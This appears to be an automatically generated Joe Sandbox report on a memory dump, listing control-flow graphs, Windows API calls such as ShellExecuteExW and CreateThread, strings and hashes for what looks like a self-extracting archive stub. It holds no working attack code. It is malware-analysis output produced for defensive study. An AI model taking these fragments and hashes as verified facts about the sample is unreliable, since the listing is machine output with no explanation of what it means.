                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: MessageTimer$CallbackCreateDispatchDispatcherHandleKillModuleUserWindow
                                              • String ID: Static
                                              • API String ID: 2479445380-2272013587
                                              • Opcode ID: 947087521f2d8a527adb1e132fdb1a2ab70df0e469f5237fcb2ff151bfac6e68
                                              • Instruction ID: 2d78b022e2fbb31551ae1a24c66cabd830678dfcab2333de03de12e069c17b52
                                              • Opcode Fuzzy Hash: 947087521f2d8a527adb1e132fdb1a2ab70df0e469f5237fcb2ff151bfac6e68
                                              • Instruction Fuzzy Hash: 2BF062325472217BCA312BA69C4DEEF3E2DEF46BB1F004260F619A11D1DAB94111C6BA

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 930 414491-4144ac call 416606 933 4144bb-4144f9 call 407613 call 4136b9 930->933 934 4144ae-4144b8 930->934 939 4145c7-4145ed call 41424b call 414186 933->939 940 4144ff-414509 ??2@YAPAXI@Z 933->940 950 41460b-414623 call 4127e6 call 413cbd 939->950 951 4145ef-414605 call 413d98 939->951 941 414518 940->941 942 41450b-414516 940->942 945 41451a-414553 call 41334e ??2@YAPAXI@Z 941->945 942->945 952 414565 945->952 953 414555-414563 945->953 967 414625-414632 ??2@YAPAXI@Z 950->967 968 41465b-41466b 950->968 951->950 961 414787-41479e 951->961 954 414567-4145a0 call 41334e call 410320 call 414020 952->954 953->954 982 4145a2-4145a4 954->982 983 4145a8-4145ad 954->983 970 414a14-414a2f call 413d2a 961->970 971 4147a4 961->971 972 414634-41463b call 414270 967->972 973 41463d 967->973 984 41469b-4146a1 968->984 985 41466d 968->985 990 414a31-414a37 970->990 991 414a3a-414a3d 970->991 978 4147a7-4147da 971->978 974 41463f-41464f call 4136b9 972->974 973->974 996 414651-414654 974->996 997 414656 974->997 1002 414810-414828 978->1002 1003 4147dc-4147e5 978->1003 982->983 993 4145b5-4145c1 983->993 994 4145af-4145b1 983->994 988 414775-414784 call 414419 984->988 989 4146a7-4146c7 call 412958 984->989 992 41466f-414695 call 412885 call 413d75 call 413edc call 413f0e 985->992 988->961 1006 4146cc-4146d4 989->1006 990->991 991->992 1000 414a43-414a6a call 41271d 991->1000 992->984 993->939 993->940 994->993 1004 414658 996->1004 997->1004 1023 414a82-414a9e 1000->1023 1024 414a6c-414a80 call 416407 1000->1024 1019 4148e2-414925 call 41271d * 2 1002->1019 1020 41482e-414833 1002->1020 1009 4147eb-414800 1003->1009 1010 41497f-414981 1003->1010 1004->968 1012 414949-41494e 1006->1012 1013 4146da-4146e1 1006->1013 1027 414ab1-414ab3 1009->1027 1028 414806-414808 1009->1028 1026 414985-41498a 1010->1026 1017 414950-414952 1012->1017 1018 414956-41495b 1012->1018 1021 4146e3-4146e7 1013->1021 1022 41470f-414712 1013->1022 1017->1018 1031 414963-414966 1018->1031 1032 41495d-41495f 1018->1032 1065 414927-41492a 1019->1065 1066 41498f 1019->1066 1033 414ac3-414ac5 1020->1033 1034 414839-41484a 1020->1034 1021->1022 1036 4146e9-4146ec 1021->1036 1029 414978-41497d 1022->1029 1030 414718-414726 call 4136b9 1022->1030 1120 414a9f call 418583 1023->1120 1121 414a9f call 4189a9 1023->1121 1122 414a9f call 413bea 1023->1122 1123 414a9f call 402a2f 1023->1123 1024->1023 1026->992 1041 414ab5-414ab7 1027->1041 1042 414abb-414abe 1027->1042 1028->1002 1046 41480a-41480c 1028->1046 1029->1010 1029->1026 1061 414733-414744 call 414020 1030->1061 1062 414728-41472e call 418e03 1030->1062 1031->992 1032->1031 1051 414ac9-414ace 1033->1051 1063 414850-414882 call 402a67 call 40b2b0 1034->1063 1064 414ad3-414ae1 SysFreeString 1034->1064 1044 4146f2-414700 call 4136b9 1036->1044 1045 41496b-414970 1036->1045 1040 414aa2-414aac call 412885 1040->992 1041->1042 1042->992 1044->1061 1069 414702-41470d call 418dde 1044->1069 1045->1026 1055 414972-414974 1045->1055 1046->1002 1051->992 1055->1029 1082 414746-414748 1061->1082 1083 41474c-414751 1061->1083 1062->1061 1092 414884-41488a 1063->1092 1093 41489a-4148b8 ??3@YAXPAX@Z 1063->1093 1067 414ae3-414ae5 1064->1067 1068 414ae9-414aeb 1064->1068 1074 41492d-414945 call 416407 1065->1074 1073 414992-414997 1066->1073 1067->1068 1068->992 1069->1061 1078 414999-4149a5 call 413fb1 1073->1078 1079 4149df-414a0b call 412885 * 2 1073->1079 1096 414947 1074->1096 1098 4149b3-4149bf call 413ffc 1078->1098 1099 4149a7-4149b1 1078->1099 1079->978 1116 414a11 1079->1116 1082->1083 1087 414753-414755 1083->1087 1088 414759-41475e 1083->1088 1087->1088 1090 414760-414762 1088->1090 1091 414766-41476f 1088->1091 1090->1091 1091->988 1091->989 1097 41488c-414898 1092->1097 1105 414af0-414af7 ??3@YAXPAX@Z 1093->1105 1106 4148be-4148da ??3@YAXPAX@Z SysFreeString 1093->1106 1096->1073 1097->1093 1097->1097 1111 4149c5 1098->1111 1112 414af9-414b09 call 412885 * 2 1098->1112 1102 4149c8-4149dd call 416407 1099->1102 1102->1078 1102->1079 1105->1064 1106->1019 1110 4148dc-4148de 1106->1110 1110->1019 1111->1102 1112->1051 1116->970 1120->1040 1121->1040 1122->1040 1123->1040
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ??2@
                                              • String ID:
                                              • API String ID: 1033339047-0
                                              • Opcode ID: 8c275e2cc856adcccae56b2b03b23110c5135f8455b1c708b9d72e7dbd912df9
                                              • Instruction ID: b54dbc60db56bc1e6d6afd4c66008574e1cbac59b919e387d83e05da41c529ad
                                              • Opcode Fuzzy Hash: 8c275e2cc856adcccae56b2b03b23110c5135f8455b1c708b9d72e7dbd912df9
                                              • Instruction Fuzzy Hash: 89321271900249DFCB14DFA5C8848EEBBB5BF88308B14456EF9169B351CB39E985CF98

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1175 4053b2-4053f7 call 4014eb * 2 memset 1180 405403-405407 1175->1180 1181 4053f9-4053fc 1175->1181 1182 405410-40542a call 404e9f call 401403 1180->1182 1183 405409 1180->1183 1181->1180 1188 405445-40545d ShellExecuteExW 1182->1188 1189 40542c-405434 ??3@YAXPAX@Z 1182->1189 1183->1182 1191 405485-405487 1188->1191 1192 40545f-405466 1188->1192 1190 405437-405444 ??3@YAXPAX@Z 1189->1190 1193 40547c-405483 ??3@YAXPAX@Z 1191->1193 1194 405473-405476 CloseHandle 1192->1194 1195 405468-40546d WaitForSingleObject 1192->1195 1193->1190 1194->1193 1195->1194
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ??3@$CloseExecuteHandleObjectShellSingleWaitmemset
                                              • String ID:
                                              • API String ID: 2700081640-0
                                              • Opcode ID: a85339e1bd803a9382c8719e0269a721a92dd258667116cddf8bfe46f874b10c
                                              • Instruction ID: a17db50f12ff5cb4ace43bc03755f74cf1bf378a7c310b81d7eb3e61b1d8450d
                                              • Opcode Fuzzy Hash: a85339e1bd803a9382c8719e0269a721a92dd258667116cddf8bfe46f874b10c
                                              • Instruction Fuzzy Hash: 3D212B71804208ABDB119FD5D885AEFBBB8EF44319F10812BE915B61A1D7785985CF84

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1196 401e6b-401e7a CreateDirectoryW 1197 401eac-401eb0 1196->1197 1198 401e7c-401e89 GetLastError 1196->1198 1199 401e96-401ea3 GetFileAttributesW 1198->1199 1200 401e8b 1198->1200 1199->1197 1202 401ea5-401ea7 1199->1202 1201 401e8c-401e95 SetLastError 1200->1201 1202->1197 1203 401ea9-401eaa 1202->1203 1203->1201
                                              APIs
                                              • CreateDirectoryW.KERNELBASE(a:@,00000000,-00000001,00403A61,?,00401A74,?,?,?,?,00401A74,?), ref: 00401E72
                                              • GetLastError.KERNEL32(?,?,?,?,00401A74,?), ref: 00401E7C
                                              • SetLastError.KERNEL32(000000B7,?,?,?,?,00401A74,?), ref: 00401E8C
                                              • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00401A74,?), ref: 00401E9A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ErrorLast$AttributesCreateDirectoryFile
                                              • String ID: a:@
                                              • API String ID: 635176117-3844204524
                                              • Opcode ID: 2870007de936e2cd6bf86a77b59755239ded30d6049a6d438da8b23bd184778b
                                              • Instruction ID: 62bb911204df67689409a0bf299a5fa733f048eefc6419992ca9e78119752425
                                              • Opcode Fuzzy Hash: 2870007de936e2cd6bf86a77b59755239ded30d6049a6d438da8b23bd184778b
                                              • Instruction Fuzzy Hash: 0CE09A3494A210BFEB212B24FC087DF3B549F01321F608A36FC19E21F0C3388852868A

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1207 416891-4168ae call 413b40 1210 4168b4-4168bb call 4163a6 1207->1210 1211 4169e6-4169e9 1207->1211 1214 4168c4-4168f3 call 40b2b0 memcpy 1210->1214 1215 4168bd-4168bf 1210->1215 1218 4168f6-4168fe 1214->1218 1215->1211 1219 416900-41690e 1218->1219 1220 416916-41692e 1218->1220 1221 416910 1219->1221 1222 41698a-416993 ??3@YAXPAX@Z 1219->1222 1226 416930-416935 1220->1226 1227 416995 1220->1227 1221->1220 1223 416912-416914 1221->1223 1224 4169e4-4169e5 1222->1224 1223->1220 1223->1222 1224->1211 1229 416937-41693f 1226->1229 1230 41699a-41699d 1226->1230 1228 416997-416998 1227->1228 1231 4169dd-4169e2 ??3@YAXPAX@Z 1228->1231 1232 416941 1229->1232 1233 416973-416985 memmove 1229->1233 1230->1228 1231->1224 1234 416950-416954 1232->1234 1233->1218 1235 416956-416958 1234->1235 1236 416948-41694a 1234->1236 1235->1233 1237 41695a-416963 call 4163a6 1235->1237 1236->1233 1238 41694c-41694d 1236->1238 1241 416965-416971 1237->1241 1242 41699f-4169d5 memcpy call 412a6a 1237->1242 1238->1234 1241->1233 1243 416943-416946 1241->1243 1244 4169d8-4169db 1242->1244 1243->1234 1244->1231
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ??3@memcpymemmove
                                              • String ID:
                                              • API String ID: 3549172513-0
                                              • Opcode ID: 85b00a1da2e75e8d58eb8ba0f360279bf7837f3aab605fd12771fdc2f3034734
                                              • Instruction ID: 6694c7cce515cef0b0cd55d5e6bb9cb7435d9f647c4cb47c4d4af15ebe31c866
                                              • Opcode Fuzzy Hash: 85b00a1da2e75e8d58eb8ba0f360279bf7837f3aab605fd12771fdc2f3034734
                                              • Instruction Fuzzy Hash: 2D41CEB1A10204ABDB20DE65C941BFFB7B9EF44704F16446EE845A7241D738EE81CBA9

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1259 404d0b-404d8c #17 call 418f40 call 402427 call 40247d * 7 1278 404d91-404da5 SHGetSpecialFolderPathW 1259->1278 1279 404e3a-404e3e 1278->1279 1280 404dab-404df5 wsprintfW call 4014eb * 2 call 401403 * 2 call 4035cf 1278->1280 1279->1278 1282 404e44-404e48 1279->1282 1291 404dfa-404e00 1280->1291 1292 404e02-404e25 call 401403 * 2 call 4035cf 1291->1292 1293 404e2a-404e30 1291->1293 1292->1293 1293->1291 1295 404e32-404e35 call 402990 1293->1295 1295->1279
                                              APIs
                                              • #17.COMCTL32(00000000,?,?), ref: 00404D17
                                                • Part of subcall function 00402427: GetUserDefaultUILanguage.KERNEL32(00404D27,?,?), ref: 00402431
                                                • Part of subcall function 0040247D: GetLastError.KERNEL32(00000000,?,?), ref: 004024CC
                                                • Part of subcall function 0040247D: wsprintfW.USER32 ref: 004024DD
                                                • Part of subcall function 0040247D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004024F2
                                                • Part of subcall function 0040247D: GetLastError.KERNEL32 ref: 004024F7
                                                • Part of subcall function 0040247D: ??2@YAPAXI@Z.MSVCRT ref: 00402512
                                                • Part of subcall function 0040247D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402525
                                                • Part of subcall function 0040247D: GetLastError.KERNEL32 ref: 0040252C
                                                • Part of subcall function 0040247D: lstrcmpiW.KERNEL32(00AB9258,?), ref: 00402541
                                                • Part of subcall function 0040247D: ??3@YAXPAX@Z.MSVCRT ref: 00402551
                                                • Part of subcall function 0040247D: SetLastError.KERNEL32(00000003), ref: 00402578
                                                • Part of subcall function 0040247D: lstrlenA.KERNEL32(0041B328), ref: 004025AC
                                                • Part of subcall function 0040247D: ??2@YAPAXI@Z.MSVCRT ref: 004025C7
                                                • Part of subcall function 0040247D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 004025F9
                                                • Part of subcall function 0040247D: ??3@YAXPAX@Z.MSVCRT ref: 0040256F
                                                • Part of subcall function 0040247D: _wtol.MSVCRT(?), ref: 0040260A
                                                • Part of subcall function 0040247D: MultiByteToWideChar.KERNEL32(00000000,0041B328,00000001,00AB9258,00000002), ref: 0040262A
                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,?,?,?,?,?), ref: 00404D9D
                                              • wsprintfW.USER32 ref: 00404DB8
                                                • Part of subcall function 004035CF: ??2@YAPAXI@Z.MSVCRT ref: 004035D4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ErrorLast$??2@$??3@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
                                              • String ID: 7zSfxFolder%02d
                                              • API String ID: 3387708999-2820892521
                                              • Opcode ID: 93e79cb75430c4e5ec341fb81b9d97ae84961af30eb98a18bccb13e1a70124f1
                                              • Instruction ID: 1fdf757244b44e0294be47ca2d8d1062c2b35c8cdb495cdfc6011dfc87a7cf41
                                              • Opcode Fuzzy Hash: 93e79cb75430c4e5ec341fb81b9d97ae84961af30eb98a18bccb13e1a70124f1
                                              • Instruction Fuzzy Hash: 8F317CB1A112089ECB11FFB2DD8AEEE7BA8AF44305F00403FA559A61E1EB784545CB59

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1301 40b2b0-40b2bb 1302 40b300-40b302 1301->1302 1303 40b2bd-40b2c0 1301->1303 1304 40b2c2-40b2d2 ??2@YAPAXI@Z 1303->1304 1305 40b2eb 1303->1305 1306 40b2d4-40b2d6 1304->1306 1307 40b2ed-40b2ff ??3@YAXPAX@Z 1304->1307 1305->1307 1308 40b2d8 1306->1308 1309 40b2da-40b2e9 memmove 1306->1309 1307->1302 1308->1309 1309->1307
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ??2@??3@memmove
                                              • String ID: hA
                                              • API String ID: 3828600508-1221461045
                                              • Opcode ID: bc9196dac32aa623d13a183dec5295da8b1281fe9b3a0aa3bad5d2b53f65af72
                                              • Instruction ID: d87302abea443053d5760b5c6252bf4bae7be4f47644660215ecec497c7fda62
                                              • Opcode Fuzzy Hash: bc9196dac32aa623d13a183dec5295da8b1281fe9b3a0aa3bad5d2b53f65af72
                                              • Instruction Fuzzy Hash: BEF0B4B66006005BC2209B1B9C9485BB7E9EFC9700704887FE92ED3700D334FC54C6AE

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1310 402ee4-402f2e call 4192c0 call 412a6a lstrlenA * 2 1314 402f33-402f4f call 412a36 1310->1314 1316 402f55-402f5a 1314->1316 1317 40301f 1314->1317 1316->1317 1318 402f60-402f6a 1316->1318 1319 403021-403025 1317->1319 1320 402f6d-402f72 1318->1320 1321 402fb1-402fb6 1320->1321 1322 402f74-402f79 1320->1322 1323 402fb8-402fcb memcmp 1321->1323 1324 402fdb-402fff memmove 1321->1324 1322->1324 1325 402f7b-402f8e memcmp 1322->1325 1326 402fab-402faf 1323->1326 1327 402fcd-402fd9 1323->1327 1328 403001-403008 1324->1328 1329 40300e-403019 1324->1329 1330 402f94-402f9e 1325->1330 1331 40301b-40301d 1325->1331 1326->1320 1327->1320 1328->1329 1332 402f30 1328->1332 1329->1319 1330->1317 1333 402fa0-402fa6 call 402c21 1330->1333 1331->1319 1332->1314 1333->1326
                                              APIs
                                              • lstrlenA.KERNEL32(?,?,00404004,0041EA30,?,?,0040618A,00000000,00000000,?,?,?,00000000,?), ref: 00402F16
                                              • lstrlenA.KERNEL32(?,?,00404004,0041EA30,?,?,0040618A,00000000,00000000,?,?,?,00000000,?), ref: 00402F1E
                                              • memcmp.MSVCRT ref: 00402F84
                                              • memcmp.MSVCRT ref: 00402FC1
                                              • memmove.MSVCRT ref: 00402FF3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: lstrlenmemcmp$memmove
                                              • String ID:
                                              • API String ID: 3251180759-0
                                              • Opcode ID: 6bc55519efb0b0d7bcd01b07c395372ad45836126fbb7a8d58e6edc0d1d2ad79
                                              • Instruction ID: 79ec95c0005fca4e8b411a1d1c8c43267f3aca6e0e8108953f5cc2358a2b563c
                                              • Opcode Fuzzy Hash: 6bc55519efb0b0d7bcd01b07c395372ad45836126fbb7a8d58e6edc0d1d2ad79
                                              • Instruction Fuzzy Hash: 9B417072D0120AAFCF01DFA4C9849EEBFB9EF48384F0444AAE805B3245D3759E85DB55

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1337 4019d2-4019e9 ??2@YAPAXI@Z 1338 4019f4 1337->1338 1339 4019eb-4019f2 call 41616a 1337->1339 1341 4019f6-401a1f call 41334e call 412a6a 1338->1341 1339->1341 1347 401a90 1341->1347 1348 401a21-401a2b ??2@YAPAXI@Z 1341->1348 1349 401a93-401aaa call 409606 1347->1349 1350 401a46 1348->1350 1351 401a2d-401a44 1348->1351 1356 401aab-401ab0 1349->1356 1353 401a48-401a5f call 40113f 1350->1353 1351->1353 1353->1349 1360 401a61-401a6b 1353->1360 1358 401ab2-401ab4 1356->1358 1359 401ab8-401aba 1356->1359 1358->1359 1361 401ac2-401ac7 1359->1361 1362 401abc-401abe 1359->1362 1363 401a79-401a83 ??2@YAPAXI@Z 1360->1363 1364 401a6d-401a6f call 4039e7 1360->1364 1366 401afc-401b00 1361->1366 1362->1361 1367 401a85-401a8e call 4016d4 1363->1367 1368 401ac9 1363->1368 1369 401a74-401a77 1364->1369 1370 401acb-401adc call 4015d8 call 401880 1367->1370 1368->1370 1369->1356 1369->1363 1376 401ae1-401ae8 1370->1376 1377 401af0-401af2 1376->1377 1378 401aea-401aec 1376->1378 1379 401af4-401af6 1377->1379 1380 401afa 1377->1380 1378->1377 1379->1380 1380->1366
                                              APIs
                                              • ??2@YAPAXI@Z.MSVCRT ref: 004019DF
                                              • ??2@YAPAXI@Z.MSVCRT ref: 00401A23
                                              • ??2@YAPAXI@Z.MSVCRT ref: 00401A7B
                                                • Part of subcall function 00409606: wvsprintfW.USER32(?,00000000,?), ref: 0040962A
                                                • Part of subcall function 00409606: GetLastError.KERNEL32 ref: 0040963B
                                                • Part of subcall function 00409606: FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,004072DC), ref: 00409663
                                                • Part of subcall function 00409606: FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,004072DC), ref: 00409678
                                                • Part of subcall function 00409606: lstrlenW.KERNEL32(?), ref: 0040968B
                                                • Part of subcall function 00409606: lstrlenW.KERNEL32(?), ref: 00409692
                                                • Part of subcall function 00409606: ??2@YAPAXI@Z.MSVCRT ref: 004096A7
                                                • Part of subcall function 00409606: lstrcpyW.KERNEL32(00000000,?), ref: 004096BD
                                                • Part of subcall function 00409606: lstrcpyW.KERNEL32(-00000002,?), ref: 004096CE
                                                • Part of subcall function 00409606: ??3@YAXPAX@Z.MSVCRT ref: 004096D7
                                                • Part of subcall function 00409606: LocalFree.KERNEL32(?), ref: 004096E1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ??2@$FormatMessagelstrcpylstrlen$??3@ErrorFreeLastLocalwvsprintf
                                              • String ID: ExecuteFile
                                              • API String ID: 1592922708-323923146
                                              • Opcode ID: 9ac5554e1c21d9026da9657adf3441f6da01eba3c8fc77f1622ea7b0805a4649
                                              • Instruction ID: c177ff4ec49e1bf3251047196a645ec591425be599670d09217b52daf662347d
                                              • Opcode Fuzzy Hash: 9ac5554e1c21d9026da9657adf3441f6da01eba3c8fc77f1622ea7b0805a4649
                                              • Instruction Fuzzy Hash: 3D31A075701204BFCB10DBA6CC85DAF77A9EF85314724486FF405EB2A1DA789D80CB69

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1382 401880-4018d6 call 4136b9 call 401403 call 401795 CreateThread 1389 4018d8 call 408caa 1382->1389 1390 4018dd-4018f8 WaitForSingleObject 1382->1390 1389->1390 1391 4018fa-4018fd 1390->1391 1392 40192c-401932 1390->1392 1394 401920 1391->1394 1395 4018ff-401902 1391->1395 1396 401990 1392->1396 1397 401934-401949 GetExitCodeThread 1392->1397 1400 401922-40192a call 409606 1394->1400 1398 401904-401907 1395->1398 1399 40191c-40191e 1395->1399 1401 401995-401998 1396->1401 1402 401953-40195e 1397->1402 1403 40194b-40194d 1397->1403 1406 401918-40191a 1398->1406 1407 401909-40190c 1398->1407 1399->1400 1400->1396 1404 401960-401961 1402->1404 1405 401966-40196f 1402->1405 1403->1402 1409 40194f-401951 1403->1409 1410 401963-401964 1404->1410 1411 401971-401978 1405->1411 1412 40197a-401986 SetLastError 1405->1412 1406->1400 1413 401913-401916 1407->1413 1414 40190e-401911 1407->1414 1409->1401 1416 401988-40198d call 409606 1410->1416 1411->1396 1411->1412 1412->1416 1413->1410 1414->1396 1414->1413 1416->1396
                                              APIs
                                              • CreateThread.KERNELBASE(00000000,00000000,0040133C,00000000,00000000,?), ref: 004018C4
                                              • WaitForSingleObject.KERNEL32(000000FF,?,00401AE1,?,?), ref: 004018E5
                                                • Part of subcall function 00409606: wvsprintfW.USER32(?,00000000,?), ref: 0040962A
                                                • Part of subcall function 00409606: GetLastError.KERNEL32 ref: 0040963B
                                                • Part of subcall function 00409606: FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,004072DC), ref: 00409663
                                                • Part of subcall function 00409606: FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,004072DC), ref: 00409678
                                                • Part of subcall function 00409606: lstrlenW.KERNEL32(?), ref: 0040968B
                                                • Part of subcall function 00409606: lstrlenW.KERNEL32(?), ref: 00409692
                                                • Part of subcall function 00409606: ??2@YAPAXI@Z.MSVCRT ref: 004096A7
                                                • Part of subcall function 00409606: lstrcpyW.KERNEL32(00000000,?), ref: 004096BD
                                                • Part of subcall function 00409606: lstrcpyW.KERNEL32(-00000002,?), ref: 004096CE
                                                • Part of subcall function 00409606: ??3@YAXPAX@Z.MSVCRT ref: 004096D7
                                                • Part of subcall function 00409606: LocalFree.KERNEL32(?), ref: 004096E1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
